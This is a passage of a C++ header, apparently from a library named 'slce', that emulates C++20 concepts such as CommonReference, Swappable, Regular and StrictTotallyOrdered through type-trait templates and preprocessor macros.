#if defined(SLCE_ENABLE_CXX14) && !defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
constexpr bool trait_name ## _v = trait_name < Args... >::value;
#elif !defined(SLCE_ENABLE_CXX14) && defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
concept SLCE_BOOL concept_name = trait_name < Args... >::value;
#elif defined(SLCE_ENABLE_CXX14) && defined(SLCE_ENABLE_CONCEPTS)
#define SLCE_HELPER( concept_name, trait_name ) \
template< typename ...Args > \
constexpr bool trait_name ## _v = trait_name < Args... >::value; \
template< typename ...Args > \
concept SLCE_BOOL concept_name = trait_name < Args... >::value;
#else
#define SLCE_HELPER( concept_name, trait_name )
#endif
#if defined(SLCE_ENABLE_CXX14)
#define SLCE_BOOLEAN_TRAIT_V( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename std::enable_if< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type; \
template< typename T > \
constexpr bool trait_name ## _v = trait_name < T >::value;
#define SLCE_BOOLEAN_TRAIT_T1( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type; \
template< typename T > \
constexpr bool trait_name ## _v = trait_name < T >::value;
#define SLCE_BOOLEAN_TRAIT_T2( trait_name, ... ) \
template< typename T, typename U, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T, typename U > \
struct trait_name< T, U, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T, typename U > \
using trait_name ## _t = typename trait_name < T, U >::type; \
template< typename T, typename U > \
constexpr bool trait_name ## _v = trait_name < T, U >::value;
#else
#define SLCE_BOOLEAN_TRAIT_V( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename std::enable_if< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type;
#define SLCE_BOOLEAN_TRAIT_T1( trait_name, ... ) \
template< typename T, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T > \
struct trait_name< T, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T > \
using trait_name ## _t = typename trait_name < T >::type;
#define SLCE_BOOLEAN_TRAIT_T2( trait_name, ... ) \
template< typename T, typename U, typename Enable = void > \
struct trait_name : public std::false_type {}; \
template< typename T, typename U > \
struct trait_name< T, U, typename slce::detail::voider< __VA_ARGS__ >::type > : public std::true_type {}; \
template< typename T, typename U > \
using trait_name ## _t = typename trait_name < T, U >::type;
#endif
namespace std {
template< typename T, typename U, template< class > class Tq, template< class > class Uq >
struct basic_common_reference;
}
namespace slce {
namespace detail {
template< typename ...Args >
struct voider {
using type = void;
};
template< typename ...Args >
struct lifter {};
template< typename T >
struct remove_cvref {
using type = typename std::remove_cv< typename std::remove_reference< T >::type >::type;
};
template< typename T >
using add_no_qual_t = T;
template< typename T >
using add_c_qual_t = const T;
template< typename T >
using add_v_qual_t = volatile T;
template< typename T >
using add_l_qual_t = T&;
template< typename T >
using add_r_qual_t = T&&;
template< typename T >
using add_cv_qual_t = add_c_qual_t< add_v_qual_t< T > >;
template< typename T >
using add_cl_qual_t = add_c_qual_t< add_l_qual_t< T > >;
template< typename T >
using add_cr_qual_t = add_c_qual_t< add_r_qual_t< T > >;
template< typename T >
using add_vl_qual_t = add_v_qual_t< add_l_qual_t< T > >;
template< typename T >
using add_vr_qual_t = add_v_qual_t< add_r_qual_t< T > >;
template< typename T >
using add_cvl_qual_t = add_c_qual_t< add_v_qual_t< add_l_qual_t< T > > >;
template< typename T >
using add_cvr_qual_t = add_c_qual_t< add_v_qual_t< add_r_qual_t< T > > >;
SLCE_BOOLEAN_TRAIT_V(
has_no_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_c_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_v_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_l_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_r_qual,
!std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cv_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cl_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cr_qual,
std::is_const< T >::value &&
!std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_vl_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_vr_qual,
!std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cvl_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
std::is_lvalue_reference< T >::value &&
!std::is_rvalue_reference< T >::value
)
SLCE_BOOLEAN_TRAIT_V(
has_cvr_qual,
std::is_const< T >::value &&
std::is_volatile< T >::value &&
!std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< T >::value
)
template< typename T, typename U >
struct copy_cvr {
using type = U;
};
template< typename T, typename U >
struct copy_cvr< T&, U > {
using type = U&;
};
template< typename T, typename U >
struct copy_cvr< T&&, U > {
using type = U&&;
};
template< typename T, typename U >
struct copy_cvr< const T, U > {
using type = const U;
};
template< typename T, typename U >
struct copy_cvr< const T&, U > {
using type = const U&;
};
template< typename T, typename U >
struct copy_cvr< const T&&, U > {
using type = const U&&;
};
template< typename T, typename U >
struct copy_cvr< volatile T, U > {
using type = volatile U;
};
template< typename T, typename U >
struct copy_cvr< volatile T&, U > {
using type = volatile U&;
};
template< typename T, typename U >
struct copy_cvr< volatile T&&, U > {
using type = volatile U&&;
};
template< typename T, typename U >
struct copy_cvr< const volatile T, U > {
using type = const volatile U;
};
template< typename T, typename U >
struct copy_cvr< const volatile T&, U > {
using type = const volatile U&;
};
template< typename T, typename U >
struct copy_cvr< const volatile T&&, U > {
using type = const volatile U&&;
};
}
template< typename T, typename U >
using is_same = std::is_same< T, U >;
SLCE_HELPER( Same, is_same )
template< typename Derived, typename Base, typename Enable = void >
struct is_derived_from : public std::false_type {};
template< typename Derived, typename Base >
struct is_derived_from< Derived, Base, typename std::enable_if<
!std::is_reference< Derived >::value && !std::is_reference< Base >::value
>::type > : public std::integral_constant<
bool, std::is_base_of< Base, Derived >::value && std::is_convertible< const volatile Derived*, const volatile Base* >::value
> {};
SLCE_HELPER( DerivedFrom, is_derived_from )
template< typename T, typename U, typename Enable = void >
struct is_convertible_to : public std::false_type {};
template< typename T, typename U >
struct is_convertible_to< T, U, typename detail::voider<
decltype( static_cast< U >( std::declval< T >() ) )
>::type > : public std::is_convertible< T, U > {};
SLCE_HELPER( ConvertibleTo, is_convertible_to )
namespace detail {
template< typename T, typename U, typename Enable = void >
struct common_lvalue_reference {};
template< typename T, typename U >
struct common_lvalue_reference< T, U, typename voider<
decltype( false ? std::declval< typename remove_cvref< T >::type& >() : std::declval< typename remove_cvref< U >::type& >() )
>::type > {
using type = decltype( false ? std::declval< typename copy_cvr< U, T >::type& >() : std::declval< typename copy_cvr< T, U >::type& >() );
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_lvalue_reference,
typename common_lvalue_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_rvalue_reference {};
template< typename T, typename U >
struct common_rvalue_reference< T, U, typename voider< typename common_lvalue_reference< T, U >::type >::type > {
using type = typename std::remove_reference<
typename common_lvalue_reference< T, U >::type
>::type&&;
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_rvalue_reference,
typename common_rvalue_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_const_reference {};
template< typename T, typename U >
struct common_const_reference< T, U, typename voider< typename common_lvalue_reference< T, const typename remove_cvref< U >::type >::type >::type > {
using type = typename std::remove_reference< typename common_lvalue_reference< T, const typename remove_cvref< U >::type >::type >::type&&;
};
SLCE_BOOLEAN_TRAIT_T2(
has_common_const_reference,
typename common_const_reference< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct simple_common_reference_type {};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_lvalue_reference< U >::value &&
std::is_lvalue_reference< typename common_lvalue_reference< T, U >::type >::value
>::type > {
using type = typename common_lvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_rvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_rvalue_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_rvalue_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< T, U, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_const_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_const_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
template< typename T, typename U >
struct simple_common_reference_type< U, T, typename std::enable_if<
std::is_lvalue_reference< T >::value &&
std::is_rvalue_reference< U >::value &&
is_convertible_to< T, typename common_const_reference< T, U >::type >::value &&
is_convertible_to< U, typename common_const_reference< T, U >::type >::value
>::type > {
using type = typename common_rvalue_reference< T, U >::type;
};
SLCE_BOOLEAN_TRAIT_T2(
has_simple_common_reference_type,
typename simple_common_reference_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct basic_common_reference_type {};
#define SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, uqual ) \
template< typename T, typename U > \
struct basic_common_reference_type< T, U, typename voider< \
typename std::enable_if< \
has_ ## tqual ## _qual< T >::value && \
has_ ## uqual ## _qual< U >::value \
>::type, \
typename std::basic_common_reference< \
typename remove_cvref< T >::type, \
typename remove_cvref< U >::type, \
add_ ## tqual ## _qual_t, \
add_ ## uqual ## _qual_t \
>::type \
>::type > { \
using type = typename std::basic_common_reference< \
typename remove_cvref< T >::type, \
typename remove_cvref< U >::type, \
add_ ## tqual ## _qual_t, \
add_ ## uqual ## _qual_t \
>::type; \
};
#define SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( tqual ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, no ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, c ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, v ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, l ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, r ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cv ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cr ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, vl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, vr ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cvl ) \
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC_L( tqual, cvr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( no )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( c )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( v )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( l )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( r )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cv )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( vl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( vr )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cvl )
SLCE_BASIC_COMMON_REFERENCE_TYPE_SPEC( cvr )
SLCE_BOOLEAN_TRAIT_T2(
has_basic_common_reference_type,
typename basic_common_reference_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct decltype_common_reference_type {};
template< typename T, typename U >
struct decltype_common_reference_type< T, U, typename voider<
decltype( false ? std::declval< T >() : std::declval< U >() )
>::type > {
using type = decltype( false ? std::declval< T >() : std::declval< U >() );
};
SLCE_BOOLEAN_TRAIT_T2(
has_decltype_common_reference_type,
typename decltype_common_reference_type< T, U >::type
)
SLCE_BOOLEAN_TRAIT_T2(
has_common_type,
typename std::common_type< T, U >::type
)
template< typename T, typename U, typename Enable = void >
struct common_reference : public std::false_type {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
has_simple_common_reference_type< T, U >::value
>::type > : public simple_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
has_basic_common_reference_type< T, U >::value
>::type > : public basic_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
!has_basic_common_reference_type< T, U >::value &&
has_decltype_common_reference_type< T, U >::value
>::type > : public decltype_common_reference_type< T, U > {};
template< typename T, typename U >
struct common_reference< T, U, typename std::enable_if<
!has_simple_common_reference_type< T, U >::value &&
!has_basic_common_reference_type< T, U >::value &&
!has_decltype_common_reference_type< T, U >::value &&
has_common_type< T, U >::value
>::type > : public std::common_type< T, U > {};
}
template< typename ...Args >
struct common_reference {};
template< typename T0 >
struct common_reference< T0 > { using type = T0; };
template< typename T0, typename T1 >
struct common_reference< T0, T1 > : public detail::common_reference< T0, T1 > {};
template< typename T0, typename T1, typename T2, typename ...Args >
struct common_reference< T0, T1, T2, Args... > : public common_reference< typename common_reference< T0, T1 >::type, T2, Args... > {};
template< typename T, typename U, typename Enable = void >
struct is_common_reference : public std::false_type {};
template< typename T, typename U >
struct is_common_reference< T, U, typename detail::voider<
typename common_reference< T, U >::type, typename common_reference< U, T >::type
>::type > : public std::integral_constant< bool,
std::is_same<
typename common_reference< T, U >::type,
typename common_reference< U, T >::type
>::value &&
std::is_convertible< T, typename common_reference< T, U >::type >::value &&
std::is_convertible< U, typename common_reference< T, U >::type >::value
> {};
SLCE_HELPER( CommonReference, is_common_reference )
template< typename T, typename U, typename Enable = void >
struct is_common : public std::false_type {};
template< typename T, typename U >
struct is_common< T, U, typename detail::voider<
decltype( static_cast< typename std::common_type< T, U >::type >( std::declval< T >() ) ),
decltype( static_cast< typename std::common_type< T, U >::type >( std::declval< U >() ) )
>::type > : public std::integral_constant< bool,
std::is_same<
typename std::common_type< T, U >::type,
typename std::common_type< U, T >::type
>::value &&
is_common_reference<
typename std::add_lvalue_reference< const T >::type,
typename std::add_lvalue_reference< const U >::type
>::value &&
is_common_reference<
typename std::add_lvalue_reference< typename std::common_type< T, U >::type >::type,
typename common_reference<
typename std::add_lvalue_reference< const T >::type,
typename std::add_lvalue_reference< const U >::type
>::type
>::value
> {};
template< typename T >
using is_integral = std::is_integral< T >;
SLCE_HELPER( Integral, is_integral )
template< typename T, typename Enable = void >
struct is_signed_integral : public std::false_type {};
template< typename T >
struct is_signed_integral< T,
typename std::enable_if< is_integral< T >::value >::type
> : public std::is_signed< T > {};
SLCE_HELPER( SignedIntegral, is_signed_integral )
template< typename T, typename Enable = void >
struct is_unsigned_integral : public std::false_type {};
template< typename T >
struct is_unsigned_integral< T,
typename std::enable_if< is_integral< T >::value >::type
> : public std::is_unsigned< T > {};
SLCE_HELPER( UnsignedIntegral, is_unsigned_integral )
template< typename L, typename R, typename Enable = void >
struct is_assignable : public std::false_type {};
template< typename L, typename R >
struct is_assignable< L, R, typename std::enable_if<
is_same<
decltype( std::declval< L >() = std::forward< R >( std::declval< R&& >() ) ),
L
>::value
>::type > : public std::integral_constant< bool,
std::is_lvalue_reference< L >::value &&
is_common_reference<
const typename std::remove_reference< L >::type&,
const typename std::remove_reference< R >::type&
>::value
> {};
SLCE_HELPER( Assignable, is_assignable )
namespace detail {
namespace using_std {
using namespace std;
template< typename T, typename U, typename Enable = void >
struct is_std_swappable : public std::false_type {};
template< typename T, typename U >
struct is_std_swappable< T, U, typename voider<
decltype( swap( std::declval< T& >(), std::declval< U& >() ) )
>::type > : public std::true_type {};
}
template< typename T, typename U, typename Enable = void >
struct is_range_swappable : public std::false_type {};
#ifdef __cpp_lib_ranges
template< typename T, typename U >
struct is_range_swappable< T, U, typename voider<
decltype( std::swap_ranges( std::declval< T& >(), std::declval< U& >() ) )
>::type > : public std::true_type {};
#endif
template< typename T, typename U, typename Enable = void >
struct is_swappable_type : public std::false_type {};
template< typename T >
struct is_swappable_type< T, T, typename std::enable_if<
std::is_move_constructible< T >::value &&
is_assignable< T&, T >::value
>::type > : public std::true_type {};
}
template< typename T, typename U >
struct is_swappable_with : public std::integral_constant< bool,
detail::using_std::is_std_swappable< T, U >::value ||
detail::is_range_swappable< T, U >::value ||
detail::is_swappable_type< T, U >::value
> {};
SLCE_HELPER( SwappableWith, is_swappable_with )
template< typename T >
struct is_swappable : public is_swappable_with< T, T > {};
SLCE_HELPER( Swappable, is_swappable )
template< typename T >
using is_destructible = std::is_nothrow_destructible< T >;
SLCE_HELPER( Destructible, is_destructible )
template< typename T, typename ...Args >
struct is_constructible : public std::integral_constant< bool,
is_destructible< T >::value &&
std::is_constructible< T, Args... >::value
> {};
SLCE_HELPER( Constructible, is_constructible )
template< typename T >
struct is_default_constructible : public is_constructible< T > {};
SLCE_HELPER( DefaultConstructible, is_default_constructible )
template< typename T >
struct is_move_constructible : public std::integral_constant< bool,
is_constructible< T, T >::value &&
is_convertible_to< T, T >::value
> {};
SLCE_HELPER( MoveConstructible, is_move_constructible )
template< typename T >
struct is_copy_constructible : public std::integral_constant< bool,
is_move_constructible< T >::value &&
is_constructible< T, T& >::value &&
is_convertible_to< T&, T >::value &&
is_constructible< T, const T& >::value &&
is_convertible_to< const T&, T >::value &&
is_constructible< T, const T >::value &&
is_convertible_to< const T, T >::value
> {};
SLCE_HELPER( CopyConstructible, is_copy_constructible )
template< typename T >
struct is_movable : public std::integral_constant< bool,
std::is_object< T >::value &&
is_move_constructible< T >::value &&
is_assignable< T&, T >::value &&
is_swappable< T >::value
> {};
SLCE_HELPER( Movable, is_movable )
template< typename T, typename Enable = void >
struct is_boolean : public std::false_type {};
template< typename T >
struct is_boolean< T, typename detail::voider<
decltype( !std::declval< const T& >() ),
decltype( std::declval< const T& >() && std::declval< bool >() ),
decltype( std::declval< const T& >() || std::declval< bool >() ),
decltype( std::declval< const T& >() && std::declval< const T& >() ),
decltype( std::declval< bool >() && std::declval< const T& >() ),
decltype( std::declval< const T& >() || std::declval< const T& >() ),
decltype( std::declval< bool >() || std::declval< const T& >() ),
decltype( std::declval< const T& >() == std::declval< const T& >() ),
decltype( std::declval< const T& >() == std::declval< bool >() ),
decltype( std::declval< bool >() == std::declval< const T& >() ),
decltype( std::declval< const T& >() != std::declval< const T& >() ),
decltype( std::declval< const T& >() != std::declval< bool >() ),
decltype( std::declval< bool >() != std::declval< const T& >() )
>::type > : public std::integral_constant< bool,
is_movable< typename detail::remove_cvref< T >::type >::value &&
is_convertible_to< const typename std::remove_reference< T >::type&, bool >::value &&
is_convertible_to< decltype( !std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() && std::declval< bool >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() || std::declval< bool >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() && std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< bool >() && std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< const T& >() || std::declval< const T& >() ), bool >::value &&
is_same< decltype( std::declval< bool >() || std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() == std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() == std::declval< bool >() ), bool >::value &&
is_convertible_to< decltype( std::declval< bool >() == std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() != std::declval< const T& >() ), bool >::value &&
is_convertible_to< decltype( std::declval< const T& >() != std::declval< bool >() ), bool >::value &&
is_convertible_to< decltype( std::declval< bool >() != std::declval< const T& >() ), bool >::value
> {};
SLCE_HELPER( Boolean, is_boolean )
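// Illustrative sanity check: plain bool satisfies every clause above (all of the
// logical and equality expressions are valid and yield exactly bool), assuming the
// is_convertible_to / is_common_reference helpers defined earlier behave like their
// standard counterparts.
static_assert( is_boolean< bool >::value, "bool models Boolean" );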
namespace detail {
template< typename T, typename U, typename Enable = void >
struct is_weakly_equality_comparable_with : public std::false_type {};
template< typename T, typename U >
struct is_weakly_equality_comparable_with< T, U, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() == std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() != std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() == std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() != std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() == std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() != std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() == std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() != std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
}
template< typename T >
struct is_equality_comparable : public detail::is_weakly_equality_comparable_with< T, T > {};
SLCE_HELPER( EqualityComparable, is_equality_comparable )
template< typename T, typename U >
struct is_equality_comparable_with : public std::integral_constant< bool,
is_equality_comparable< T >::value &&
is_equality_comparable< U >::value &&
is_common_reference< const typename std::remove_reference< T >::type&, const typename std::remove_reference< U >::type& >::value &&
is_equality_comparable<
typename common_reference< const typename std::remove_reference< T >::type&, const typename std::remove_reference< U >::type& >::type
>::value &&
detail::is_weakly_equality_comparable_with< T, U >::value
> {};
SLCE_HELPER( EqualityComparableWith, is_equality_comparable_with )
template< typename T, typename Enable = void >
struct is_strict_totally_ordered : public std::false_type {};
template< typename T >
struct is_strict_totally_ordered< T, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
is_equality_comparable< T >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
SLCE_HELPER( StrictTotallyOrdered, is_strict_totally_ordered )
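// Illustrative sanity check: the built-in relational operators on int all yield
// bool and int is equality comparable, so it models the ordering trait above.
static_assert( is_strict_totally_ordered< int >::value, "int is strict totally ordered" );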
template< typename T, typename U, typename Enable = void >
struct is_strict_totally_ordered_with : public std::false_type {};
template< typename T, typename U >
struct is_strict_totally_ordered_with< T, U, typename detail::voider<
decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< U >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ),
decltype( std::declval< const typename std::remove_reference< U >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() )
>::type > : public std::integral_constant< bool,
is_strict_totally_ordered< T >::value &&
is_strict_totally_ordered< U >::value &&
is_equality_comparable_with< T, U >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() < std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() > std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() <= std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< T >::type& >() >= std::declval< const typename std::remove_reference< U >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() < std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() > std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() <= std::declval< const typename std::remove_reference< T >::type& >() ) >::value &&
std::is_same< bool, decltype( std::declval< const typename std::remove_reference< U >::type& >() >= std::declval< const typename std::remove_reference< T >::type& >() ) >::value
> {};
SLCE_HELPER( StrictTotallyOrderedWith, is_strict_totally_ordered_with )
template< typename T >
struct is_copyable : public std::integral_constant<
bool,
is_copy_constructible< T >::value &&
is_movable< T >::value &&
is_assignable< T&, const T& >::value
> {};
SLCE_HELPER( Copyable, is_copyable )
template< typename T >
struct is_semiregular : public std::integral_constant<
bool,
is_copyable< T >::value &&
is_default_constructible< T >::value
> {};
SLCE_HELPER( Semiregular, is_semiregular )
template< typename T >
struct is_regular : public std::integral_constant<
bool,
is_semiregular< T >::value &&
is_equality_comparable< T >::value
> {};
SLCE_HELPER( Regular, is_regular )
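// Illustrative sanity checks: int is copy constructible, default constructible,
// assignable, swappable and equality comparable, so it should satisfy the whole
// Copyable / Semiregular / Regular chain above (again assuming the earlier
// is_convertible_to helper behaves like the standard ConvertibleTo).
static_assert( is_copyable< int >::value, "int is copyable" );
static_assert( is_semiregular< int >::value, "int is semiregular" );
static_assert( is_regular< int >::value, "int is regular" );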
namespace detail {
template< typename T, typename Args, typename Enable = void >
struct is_invocable : public std::false_type {};
#ifdef __cpp_lib_invoke
template< typename F, template< typename ... > typename L, typename ... Args >
struct is_invocable< F, L< Args... >, typename voider<
decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) )
>::type > : public std::true_type {};
#endif
}
template< typename T, typename ...Args >
struct is_invocable : public detail::is_invocable< T, detail::lifter< Args... > > {};
SLCE_HELPER( Invocable, is_invocable )
template< typename T, typename ...Args >
struct is_regular_invocable : public is_invocable< T, Args... > {};
SLCE_HELPER( RegularInvocable, is_regular_invocable )
namespace detail {
template< typename T, typename Args, typename Enable = void >
struct is_predicate : public std::false_type {};
#ifdef __cpp_lib_invoke
template< typename F, template< typename ... > typename L, typename ... Args >
struct is_predicate< F, L< Args... >, typename voider<
decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) )
>::type > : public std::integral_constant<
bool,
::slce::is_regular_invocable< F, Args... >::value &&
std::is_same<
bool,
typename std::remove_cv< decltype( std::invoke( std::declval< F&& >(), std::declval< Args&& >()... ) ) >::type
>::value
> {};
